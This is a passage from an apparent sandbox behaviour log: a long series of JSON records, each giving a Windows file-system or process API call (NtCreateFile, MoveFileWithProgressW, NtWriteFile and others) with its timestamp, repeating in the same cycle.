17:42:00,048", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:00,048", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,059", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,059", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 
17:42:00,069", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,079", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,089", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", 
"api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,099", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,109", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,119", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,119", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,129", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:42:00,139", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,149", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,159", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,169", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,169", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,179", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:00,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,189", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,199", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:00,209", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,209", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,219", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,229", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,239", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,249", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,259", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,259", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,259", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,269", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,269", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,269", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,269", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,279", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,289", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,299", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,299", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,299", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:00,299", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,299", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,319", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,339", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,339", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,339", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,339", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,349", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:00,349", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,349", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,349", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,359", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,359", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,359", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,359", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,369", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,369", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,369", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,369", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,379", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:00,379", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,389", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,409", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:00,409", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,419", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,429", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,439", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,449", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,459", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtWriteFile"}, {"category": "filesystem", 